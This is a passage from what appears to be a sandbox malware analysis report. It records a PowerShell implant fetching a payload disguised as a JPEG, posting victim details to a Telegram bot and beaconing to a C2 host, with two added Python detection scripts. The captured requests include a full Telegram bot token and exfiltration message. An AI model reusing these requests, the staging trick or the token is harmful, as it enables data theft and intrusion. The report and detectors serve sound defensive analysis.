                                                                                                        Nov 25, 2024 15:24:33.011812925 CET616149718178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:24:33.011899948 CET497186161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:38.017643929 CET497186161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:38.019021988 CET497196161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:38.138328075 CET616149718178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:24:38.139522076 CET616149719178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:24:38.139651060 CET497196161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:38.140114069 CET497196161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:24:38.262214899 CET616149719178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:00.114622116 CET616149719178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:00.114720106 CET497196161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:05.126965046 CET497196161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:05.249360085 CET616149719178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:05.507419109 CET497206161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:05.825428009 CET616149720178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:05.825526953 CET497206161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:05.825938940 CET497206161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:05.946125031 CET616149720178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:27.755732059 CET616149720178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:27.755795002 CET497206161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:32.773791075 CET497206161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:32.774642944 CET497216161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:32.894442081 CET616149720178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:32.894782066 CET616149721178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:32.894979954 CET497216161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:32.895472050 CET497216161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:33.017524958 CET616149721178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:54.819591045 CET616149721178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:54.819859982 CET497216161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:59.830066919 CET497216161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:59.831240892 CET497226161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:59.954807043 CET616149721178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:59.955987930 CET616149722178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:25:59.956235886 CET497226161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:25:59.956516027 CET497226161192.168.2.8178.208.169.197
                                                                                                        Nov 25, 2024 15:26:00.076596022 CET616149722178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:26:21.929388046 CET616149722178.208.169.197192.168.2.8
                                                                                                        Nov 25, 2024 15:26:21.929488897 CET497226161192.168.2.8178.208.169.197
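The TCP rows above show the implant tearing down and re-opening its connection to 178.208.169.197:6161 about every 27 seconds, each time from a new ephemeral port (49714, 49717, 49718, 49719, 49720, 49721, 49722), and re-resolving the C2 name right before the 15:25:05 reconnect. That cadence is the most robust network indicator in this report, because it survives a change of IP or domain. The Python below is an added example, not part of the Joe Sandbox report: it parses packet rows laid out as pipe-separated Timestamp | Source Port | Dest Port | Source IP | Dest IP columns (the columns of the table above), records when each outbound flow starts, and flags any peer contacted with a low-variance interval. The internal-network prefix, the minimum connection count and the variance threshold are assumptions; the sample rows are a subset copied from the table.

```python
import math
from collections import defaultdict
from datetime import datetime

# Assumption: the analysed host is the only 192.168.x address in the capture.
INTERNAL_PREFIX = "192.168."

# Constructed sample: a subset of the report's TCP packet rows, one packet per line,
# columns Timestamp | Source Port | Dest Port | Source IP | Dest IP.
SAMPLE_ROWS = """
Nov 25, 2024 15:22:50.321069002 CET | 49711 | 443 | 192.168.2.8 | 149.154.167.220
Nov 25, 2024 15:22:50.321108103 CET | 443 | 49711 | 149.154.167.220 | 192.168.2.8
Nov 25, 2024 15:23:11.597398996 CET | 6161 | 49712 | 178.208.169.197 | 192.168.2.8
Nov 25, 2024 15:23:11.597497940 CET | 49712 | 6161 | 192.168.2.8 | 178.208.169.197
Nov 25, 2024 15:23:16.630218029 CET | 49714 | 6161 | 192.168.2.8 | 178.208.169.197
Nov 25, 2024 15:23:16.750838995 CET | 6161 | 49714 | 178.208.169.197 | 192.168.2.8
Nov 25, 2024 15:23:43.846872091 CET | 49717 | 6161 | 192.168.2.8 | 178.208.169.197
Nov 25, 2024 15:23:49.033512115 CET | 49703 | 443 | 192.168.2.8 | 13.107.246.63
Nov 25, 2024 15:24:10.940041065 CET | 49718 | 6161 | 192.168.2.8 | 178.208.169.197
Nov 25, 2024 15:24:38.019021988 CET | 49719 | 6161 | 192.168.2.8 | 178.208.169.197
Nov 25, 2024 15:25:05.507419109 CET | 49720 | 6161 | 192.168.2.8 | 178.208.169.197
Nov 25, 2024 15:25:32.774642944 CET | 49721 | 6161 | 192.168.2.8 | 178.208.169.197
Nov 25, 2024 15:25:59.831240892 CET | 49722 | 6161 | 192.168.2.8 | 178.208.169.197
Nov 25, 2024 15:26:21.929488897 CET | 49722 | 6161 | 192.168.2.8 | 178.208.169.197
"""


def parse_ts(text):
    """'Nov 25, 2024 15:23:16.630218029 CET' -> float seconds, nanosecond fraction kept.
    The zone suffix is dropped; only differences between timestamps are used."""
    stamp, _zone = text.rsplit(" ", 1)
    main, frac = stamp.split(".")
    dt = datetime.strptime(main, "%b %d, %Y %H:%M:%S")
    return (dt - datetime(1970, 1, 1)).total_seconds() + int(frac.ljust(9, "0")[:9]) / 1e9


def parse_rows(text):
    """Return a list of (ts, src_ip, src_port, dst_ip, dst_port) tuples."""
    packets = []
    for line in text.strip().splitlines():
        ts, sport, dport, sip, dip = [field.strip() for field in line.split("|")]
        packets.append((parse_ts(ts), sip, int(sport), dip, int(dport)))
    return packets


def connection_starts(packets):
    """Map (peer_ip, peer_port) -> sorted start times of outbound flows.

    A flow is keyed on the internal side's ephemeral port. Its start is the first packet
    seen on it, and it is only counted when that first packet was outbound: a flow whose
    first visible packet comes from the peer (49712 in the sample) predates the capture
    window and would distort the interval statistics."""
    first_seen = {}
    for ts, sip, sport, dip, dport in sorted(packets):
        if sip.startswith(INTERNAL_PREFIX):
            key, outbound = (sip, sport, dip, dport), True
        else:
            key, outbound = (dip, dport, sip, sport), False
        first_seen.setdefault(key, (ts, outbound))
    starts = defaultdict(list)
    for (_, _, peer_ip, peer_port), (ts, outbound) in first_seen.items():
        if outbound:
            starts[(peer_ip, peer_port)].append(ts)
    return {peer: sorted(times) for peer, times in starts.items()}


def beacon_stats(times):
    """Mean gap between successive connection starts and its coefficient of variation."""
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    if len(gaps) < 3:
        return None
    mean = sum(gaps) / len(gaps)
    std = math.sqrt(sum((g - mean) ** 2 for g in gaps) / len(gaps))
    return {"connections": len(times), "mean_gap": mean, "cv": std / mean if mean else float("inf")}


def find_beacons(packets, min_connections=4, max_cv=0.1):
    """Peers reconnected to at least min_connections times with a near-constant gap."""
    hits = {}
    for peer, times in connection_starts(packets).items():
        stats = beacon_stats(times)
        if stats and stats["connections"] >= min_connections and stats["cv"] <= max_cv:
            hits[peer] = stats
    return hits


if __name__ == "__main__":
    for (ip, port), s in find_beacons(parse_rows(SAMPLE_ROWS)).items():
        print(f"{ip}:{port}  {s['connections']} connections, "
              f"mean gap {s['mean_gap']:.1f}s, cv {s['cv']:.3f}")
```

On the sample this reports only 178.208.169.197:6161, with seven outbound connections and a mean gap of roughly 27.2 s at a coefficient of variation well under 1%; the single TLS sessions to 149.154.167.220 and 13.107.246.63 never reach the connection threshold. On real traffic, lower the threshold for long-lived hosts and raise max_cv slightly if the implant adds jitter, but a fixed reconnect timer such as this one stays well inside 0.1.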
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 15:22:16.223692894 CET | 51725 | 53 | 192.168.2.8 | 1.1.1.1
Nov 25, 2024 15:22:16.865111113 CET | 53 | 51725 | 1.1.1.1 | 192.168.2.8
Nov 25, 2024 15:22:43.893712997 CET | 61972 | 53 | 192.168.2.8 | 1.1.1.1
Nov 25, 2024 15:22:44.031040907 CET | 53 | 61972 | 1.1.1.1 | 192.168.2.8
Nov 25, 2024 15:22:46.407434940 CET | 54077 | 53 | 192.168.2.8 | 1.1.1.1
Nov 25, 2024 15:22:46.545154095 CET | 53 | 54077 | 1.1.1.1 | 192.168.2.8
Nov 25, 2024 15:22:49.222029924 CET | 63521 | 53 | 192.168.2.8 | 1.1.1.1
Nov 25, 2024 15:22:49.549777031 CET | 53 | 63521 | 1.1.1.1 | 192.168.2.8
Nov 25, 2024 15:25:05.127613068 CET | 63738 | 53 | 192.168.2.8 | 1.1.1.1
Nov 25, 2024 15:25:05.506541967 CET | 53 | 63738 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 15:22:16.223692894 CET | 192.168.2.8 | 1.1.1.1 | 0xe6a3 | Standard query (0) | almamas.com.ly | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:22:43.893712997 CET | 192.168.2.8 | 1.1.1.1 | 0xcfa8 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:22:46.407434940 CET | 192.168.2.8 | 1.1.1.1 | 0x9e57 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:22:49.222029924 CET | 192.168.2.8 | 1.1.1.1 | 0x6ee9 | Standard query (0) | ducksex.ddnsfree.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:25:05.127613068 CET | 192.168.2.8 | 1.1.1.1 | 0x54fe | Standard query (0) | ducksex.ddnsfree.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 15:22:16.865111113 CET | 1.1.1.1 | 192.168.2.8 | 0xe6a3 | No error (0) | almamas.com.ly | | 168.119.208.219 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:22:31.421943903 CET | 1.1.1.1 | 192.168.2.8 | 0xf033 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:22:31.421943903 CET | 1.1.1.1 | 192.168.2.8 | 0xf033 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:22:44.031040907 CET | 1.1.1.1 | 192.168.2.8 | 0xcfa8 | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:22:46.545154095 CET | 1.1.1.1 | 192.168.2.8 | 0x9e57 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:22:49.549777031 CET | 1.1.1.1 | 192.168.2.8 | 0x6ee9 | No error (0) | ducksex.ddnsfree.com | | 178.208.169.197 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:23:33.540409088 CET | 1.1.1.1 | 192.168.2.8 | 0x8125 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 15:23:33.540409088 CET | 1.1.1.1 | 192.168.2.8 | 0x8125 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:23:36.218230009 CET | 1.1.1.1 | 192.168.2.8 | 0xa56e | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:23:36.218230009 CET | 1.1.1.1 | 192.168.2.8 | 0xa56e | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:25:05.506541967 CET | 1.1.1.1 | 192.168.2.8 | 0x54fe | No error (0) | ducksex.ddnsfree.com | | 178.208.169.197 | A (IP address) | IN (0x0001) | false
• almamas.com.ly
• ipinfo.io
• api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 168.119.208.219 | 443 | 2216 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
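The PowerShell session below fetches /wblwxiun.rtw/pnilrykd.jpg from almamas.com.ly and receives a 271030-byte body served as image/jpeg, but the decoded "Data Ascii" rows show it is plain text: a run of taskkill /IM ... /F lines followed by long comma-separated decimal byte lists, which matches the report's "AV process strings found" and MSILLoadEncryptedAssembly detections. The Python below is an added example, not part of the Joe Sandbox report, of the triage a proxy or sandbox post-processor can apply to such a response: it decodes the report's hex dump, checks the declared Content-Type against the file magic, measures how much of the body is printable, pulls out the process names the script kills, and converts a decimal byte list back into raw bytes. The hex samples are copied from the report's first two Data Raw rows (truncated), the magic table and the 95% text threshold are assumptions, and nothing here decrypts the byte array, since the report does not show the key.

```python
import re

# Constructed sample: hex copied from the report's "Data Raw" rows for the response to
# GET /wblwxiun.rtw/pnilrykd.jpg. First three lines of chunk 1, opening bytes of chunk 2.
RAW_CHUNK_1 = (
    "74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 43 43 6c 65 61 6e 65 72 42 72 6f 77 73 65 72 2e 65 78 65 20 2f 46 0a "
    "74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 61 73 70 6e 65 74 5f 72 65 67 62 72 6f 77 73 65 72 73 2e 65 78 65 20 2f 46 0a "
    "74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 61 73 70 6e 65 74 5f 63 6f 6d 70 69 6c 65 72 2e 65 78 65 20 2f 46 0a"
)
RAW_CHUNK_2 = "30 2c 31 38 32 2c 32 35 34 2c 31 37 32 2c 34 30 2c 31 36 39 2c 33 35 2c 32 31 35"

# Response headers as shown in the report.
RESPONSE_HEADERS = {"Content-Type": "image/jpeg", "Content-Length": "271030"}

# Assumption: leading bytes a genuine file of each declared type must carry.
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}


def hexdump_to_bytes(dump):
    """Turn a space-separated hex dump ('74 61 73 ...') into bytes."""
    return bytes.fromhex(dump)


def declared_type_matches(content_type, body):
    """True when the body starts with the magic of the declared MIME type (or the type is unknown)."""
    mime = content_type.split(";")[0].strip().lower()
    magics = MAGIC.get(mime)
    if magics is None:
        return True
    return any(body.startswith(m) for m in magics)


def printable_ratio(body):
    """Fraction of bytes that are printable ASCII, tab, CR or LF."""
    if not body:
        return 0.0
    printable = sum(1 for b in body if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(body)


def taskkill_targets(body):
    """Image names passed to 'taskkill /IM <name> /F' anywhere in the body."""
    return [m.decode() for m in re.findall(rb"taskkill\s+/IM\s+(\S+)\s+/F", body)]


def decode_decimal_array(text):
    """'0,182,254,...' -> bytes; rejects tokens that are not byte values."""
    values = [int(tok) for tok in text.split(",") if tok.strip()]
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("token outside 0..255, not a byte array")
    return bytes(values)


def triage_response(headers, body):
    """Summarise why a 'jpeg' response deserves a closer look."""
    findings = []
    content_type = headers.get("Content-Type", "")
    if not declared_type_matches(content_type, body):
        findings.append(f"declared {content_type} but body lacks the file magic")
    ratio = printable_ratio(body)
    if ratio > 0.95:  # assumption: an image body is never this text-heavy
        findings.append("body is printable text, not a binary image")
    targets = taskkill_targets(body)
    if targets:
        findings.append(f"script kills {len(targets)} processes by image name")
    return {"content_type": content_type, "printable_ratio": ratio,
            "targets": targets, "findings": findings}


if __name__ == "__main__":
    result = triage_response(RESPONSE_HEADERS, hexdump_to_bytes(RAW_CHUNK_1))
    for finding in result["findings"]:
        print("-", finding)
    print("kills:", result["targets"])
    print("chunk 2 decodes to:", list(decode_decimal_array(hexdump_to_bytes(RAW_CHUNK_2).decode("ascii"))))
```

Two caveats when applying this to the full stream: the report's chunks are cut at fixed sizes, so a decimal token can be split across a chunk boundary and the chunks must be joined before decoding, and a magic-byte check only catches lazy staging like this one; a payload appended after a valid JPEG header passes it and needs the printable-ratio or an entropy check instead.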
Timestamp | Bytes transferred | Direction | Data
2024-11-25 14:22:24 UTC | 89 | OUT | GET /wblwxiun.rtw/pnilrykd.jpg HTTP/1.1
Host: almamas.com.ly
Connection: Keep-Alive
2024-11-25 14:22:24 UTC | 209 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 14:22:24 GMT
Server: Apache
Last-Modified: Mon, 18 Nov 2024 12:51:34 GMT
Accept-Ranges: bytes
Content-Length: 271030
Connection: close
Content-Type: image/jpeg
                                                                                                        2024-11-25 14:22:24 UTC7983INData Raw: 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 43 43 6c 65 61 6e 65 72 42 72 6f 77 73 65 72 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 61 73 70 6e 65 74 5f 72 65 67 62 72 6f 77 73 65 72 73 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 61 73 70 6e 65 74 5f 63 6f 6d 70 69 6c 65 72 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 41 70 70 4c 61 75 6e 63 68 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 49 6e 73 74 61 6c 6c 55 74 69 6c 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 6a 73 63 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 4d 53 42 75 69 6c 64 2e 65 78 65 20 2f 46 0a 74 61 73 6b 6b 69 6c 6c 20 2f 49 4d 20 52 65 67 41 73 6d 2e 65 78 65 20 2f 46 0a 74 61 73
                                                                                                        Data Ascii: taskkill /IM CCleanerBrowser.exe /Ftaskkill /IM aspnet_regbrowsers.exe /Ftaskkill /IM aspnet_compiler.exe /Ftaskkill /IM AppLaunch.exe /Ftaskkill /IM InstallUtil.exe /Ftaskkill /IM jsc.exe /Ftaskkill /IM MSBuild.exe /Ftaskkill /IM RegAsm.exe /Ftas
                                                                                                        2024-11-25 14:22:24 UTC8000INData Raw: 30 2c 31 38 32 2c 32 35 34 2c 31 37 32 2c 34 30 2c 31 36 39 2c 33 35 2c 32 31 35 2c 31 36 37 2c 31 38 31 2c 32 30 33 2c 31 39 36 2c 32 34 34 2c 35 37 2c 32 31 37 2c 38 36 2c 31 35 36 2c 32 33 35 2c 32 31 36 2c 32 31 34 2c 37 31 2c 32 34 33 2c 32 31 38 2c 32 31 36 2c 32 31 34 2c 37 31 2c 32 34 32 2c 31 32 30 2c 31 39 35 2c 37 30 2c 31 35 30 2c 37 38 2c 39 36 2c 32 34 30 2c 31 32 37 2c 31 34 31 2c 38 36 2c 32 32 31 2c 38 35 2c 31 32 39 2c 31 37 39 2c 31 30 33 2c 36 32 2c 31 37 32 2c 31 31 32 2c 31 38 31 2c 32 32 37 2c 31 30 36 2c 31 31 30 2c 39 35 2c 33 37 2c 31 34 32 2c 37 35 2c 31 35 32 2c 31 30 32 2c 32 31 32 2c 31 35 35 2c 31 32 37 2c 31 36 37 2c 31 34 37 2c 39 37 2c 31 34 38 2c 37 30 2c 32 31 35 2c 31 30 36 2c 31 31 37 2c 39 30 2c 39 32 2c 31 31 35 2c
                                                                                                        Data Ascii: 0,182,254,172,40,169,35,215,167,181,203,196,244,57,217,86,156,235,216,214,71,243,218,216,214,71,242,120,195,70,150,78,96,240,127,141,86,221,85,129,179,103,62,172,112,181,227,106,110,95,37,142,75,152,102,212,155,127,167,147,97,148,70,215,106,117,90,92,115,
                                                                                                        2024-11-25 14:22:24 UTC8000INData Raw: 35 2c 32 33 39 2c 31 39 35 2c 31 35 31 2c 31 39 2c 31 39 34 2c 31 33 39 2c 31 30 39 2c 32 31 30 2c 36 30 2c 31 32 39 2c 31 33 35 2c 31 33 30 2c 31 30 36 2c 37 33 2c 32 31 39 2c 33 37 2c 32 33 37 2c 35 37 2c 32 33 33 2c 39 31 2c 32 31 38 2c 32 33 2c 32 31 31 2c 38 36 2c 37 32 2c 39 35 2c 31 36 30 2c 32 33 37 2c 31 39 39 2c 32 33 37 2c 31 33 39 2c 31 30 34 2c 35 39 2c 31 37 36 2c 35 38 2c 33 39 2c 31 32 35 2c 32 34 33 2c 32 33 34 2c 31 39 37 2c 31 38 30 2c 32 31 2c 32 31 30 2c 32 33 2c 31 30 34 2c 31 38 37 2c 31 30 33 2c 32 34 35 2c 33 34 2c 32 31 38 2c 31 34 36 2c 31 38 36 2c 31 35 36 2c 32 34 34 2c 31 32 31 2c 31 38 36 2c 31 39 37 2c 31 38 30 2c 32 31 2c 32 31 30 2c 31 31 2c 32 31 38 2c 39 30 2c 38 31 2c 32 31 39 2c 32 31 35 2c 31 31 36 2c 31 39 37 2c 32
                                                                                                        Data Ascii: 5,239,195,151,19,194,139,109,210,60,129,135,130,106,73,219,37,237,57,233,91,218,23,211,86,72,95,160,237,199,237,139,104,59,176,58,39,125,243,234,197,180,21,210,23,104,187,103,245,34,218,146,186,156,244,121,186,197,180,21,210,11,218,90,81,219,215,116,197,2
                                                                                                        2024-11-25 14:22:24 UTC8000INData Raw: 36 36 2c 32 33 38 2c 31 36 33 2c 37 36 2c 37 38 2c 39 39 2c 31 38 33 2c 35 2c 32 33 37 2c 31 32 30 2c 31 37 35 2c 32 38 2c 32 33 33 2c 32 33 30 2c 31 35 39 2c 36 31 2c 32 34 37 2c 31 37 30 2c 31 36 34 2c 31 35 30 2c 32 32 31 2c 31 36 35 2c 31 32 30 2c 31 36 30 2c 31 32 33 2c 33 39 2c 31 38 31 2c 31 39 35 2c 38 33 2c 31 34 37 2c 31 32 35 2c 31 36 39 2c 32 31 39 2c 31 39 39 2c 32 32 38 2c 34 2c 31 38 36 2c 31 33 2c 31 35 32 2c 32 32 35 2c 31 37 2c 31 35 34 2c 32 32 35 2c 32 33 33 2c 31 39 36 2c 32 31 33 2c 32 33 39 2c 32 36 2c 32 36 2c 31 30 34 2c 31 33 34 2c 31 35 38 2c 31 34 33 2c 32 35 35 2c 32 34 33 2c 31 38 31 2c 32 33 38 2c 31 37 39 2c 37 33 2c 31 34 32 2c 32 31 39 2c 31 32 35 2c 35 35 2c 32 32 2c 32 35 34 2c 31 31 37 2c 38 31 2c 31 37 33 2c 32 35 34
                                                                                                        Data Ascii: 66,238,163,76,78,99,183,5,237,120,175,28,233,230,159,61,247,170,164,150,221,165,120,160,123,39,181,195,83,147,125,169,219,199,228,4,186,13,152,225,17,154,225,233,196,213,239,26,26,104,134,158,143,255,243,181,238,179,73,142,219,125,55,22,254,117,81,173,254
                                                                                                        2024-11-25 14:22:24 UTC8000INData Raw: 2c 31 30 34 2c 34 2c 32 32 37 2c 31 35 38 2c 32 37 2c 31 32 37 2c 31 37 34 2c 38 34 2c 31 36 36 2c 31 36 30 2c 31 39 31 2c 31 31 38 2c 36 34 2c 32 33 39 2c 39 33 2c 31 33 36 2c 32 33 2c 31 32 38 2c 31 38 32 2c 32 31 31 2c 31 37 34 2c 32 34 34 2c 31 30 37 2c 31 35 36 2c 33 33 2c 31 36 35 2c 36 38 2c 34 36 2c 31 37 32 2c 31 30 37 2c 32 30 30 2c 32 35 33 2c 31 32 30 2c 36 36 2c 31 35 33 2c 31 37 32 2c 32 34 30 2c 31 33 33 2c 32 39 2c 31 32 35 2c 36 37 2c 32 31 37 2c 32 35 30 2c 31 35 35 2c 39 38 2c 37 33 2c 32 35 30 2c 38 39 2c 32 32 32 2c 34 39 2c 31 33 30 2c 39 30 2c 32 34 31 2c 31 37 34 2c 31 33 34 2c 37 36 2c 35 32 2c 36 39 2c 36 39 2c 31 37 33 2c 31 36 34 2c 31 39 31 2c 31 38 35 2c 31 36 31 2c 31 32 33 2c 31 36 2c 33 36 2c 31 33 39 2c 31 38 35 2c 35 30
                                                                                                        Data Ascii: ,104,4,227,158,27,127,174,84,166,160,191,118,64,239,93,136,23,128,182,211,174,244,107,156,33,165,68,46,172,107,200,253,120,66,153,172,240,133,29,125,67,217,250,155,98,73,250,89,222,49,130,90,241,174,134,76,52,69,69,173,164,191,185,161,123,16,36,139,185,50
                                                                                                        2024-11-25 14:22:24 UTC8000INData Raw: 32 34 39 2c 31 30 31 2c 31 38 30 2c 31 34 38 2c 32 31 39 2c 31 35 31 2c 33 34 2c 31 38 38 2c 31 35 32 2c 31 30 36 2c 32 31 36 2c 31 30 2c 31 38 35 2c 31 38 30 2c 32 32 38 2c 31 38 30 2c 32 31 34 2c 31 33 38 2c 31 38 32 2c 31 30 31 2c 31 30 30 2c 32 32 37 2c 32 30 32 2c 33 39 2c 35 38 2c 31 35 30 2c 31 37 2c 37 31 2c 32 30 33 2c 31 39 2c 32 39 2c 38 37 2c 34 39 2c 31 31 31 2c 31 37 33 2c 31 39 36 2c 35 35 2c 32 33 30 2c 32 35 31 2c 31 31 37 2c 37 39 2c 31 31 36 2c 31 31 32 2c 31 30 30 2c 32 35 35 2c 34 32 2c 31 38 30 2c 31 33 32 2c 33 39 2c 38 2c 32 30 37 2c 31 30 37 2c 36 36 2c 31 32 30 2c 35 37 2c 31 39 37 2c 33 35 2c 32 31 32 2c 31 37 31 2c 32 34 37 2c 38 31 2c 31 35 2c 32 31 39 2c 31 36 31 2c 31 35 39 2c 35 32 2c 31 34 37 2c 31 35 2c 31 35 35 2c 32 33
                                                                                                        Data Ascii: 249,101,180,148,219,151,34,188,152,106,216,10,185,180,228,180,214,138,182,101,100,227,202,39,58,150,17,71,203,19,29,87,49,111,173,196,55,230,251,117,79,116,112,100,255,42,180,132,39,8,207,107,66,120,57,197,35,212,171,247,81,15,219,161,159,52,147,15,155,23


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.8  49709        34.117.59.81    443               2216  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-11-25 14:22:45 UTC   Bytes transferred: 158   Direction: OUT
GET /json HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: ipinfo.io
Connection: Keep-Alive

Timestamp: 2024-11-25 14:22:45 UTC   Bytes transferred: 345   Direction: IN
HTTP/1.1 200 OK
access-control-allow-origin: *
Content-Length: 319
content-type: application/json; charset=utf-8
date: Mon, 25 Nov 2024 14:22:45 GMT
x-content-type-options: nosniff
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close

Timestamp: 2024-11-25 14:22:45 UTC   Bytes transferred: 319   Direction: IN
Data Ascii:
{
  "ip": "8.46.123.75",
  "hostname": "static-cpe-8-46-123-75.centurylink.com",
  "city": "New York City",
  "region": "New York",
  "country": "US",
  "loc": "40.7143,-74.0060",
  "org": "AS3356 Level 3 Parent, LLC",
  "postal": "10001",
  "timezone": "


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
2           192.168.2.8  49710        149.154.167.220  443               2216  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-11-25 14:22:47 UTC   Bytes transferred: 276   Direction: OUT
POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/json
Host: api.telegram.org
Content-Length: 268
Connection: Keep-Alive

Timestamp: 2024-11-25 14:22:48 UTC   Bytes transferred: 268   Direction: OUT
Data Ascii:
{
    "chat_id":  "7169414115",
    "text":  "Hack By WORMS:\n- Device ID: dab9bbf4-a9ba-41e9-ab7a-ecdd741936e7\n- HWID: D122AAC5F0 271F762DAF\n- Public IP: 8.46.123.75\n- Country: US\n- Username: user\n- Computer Name: user-PC\n- Antivirus: Windows

Timestamp: 2024-11-25 14:22:48 UTC   Bytes transferred: 388   Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 25 Nov 2024 14:22:48 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Timestamp: 2024-11-25 14:22:48 UTC   Bytes transferred: 534   Direction: IN
Data Ascii:
{"ok":true,"result":{"message_id":5969,"from":{"id":8168254885,"is_bot":true,"first_name":"PCSENDBot","username":"PCSEND111bot"},"chat":{"id":7169414115,"first_name":"Jacson","last_name":"Rec","username":"xworm_njrat","type":"private"},"date":1732544568,"


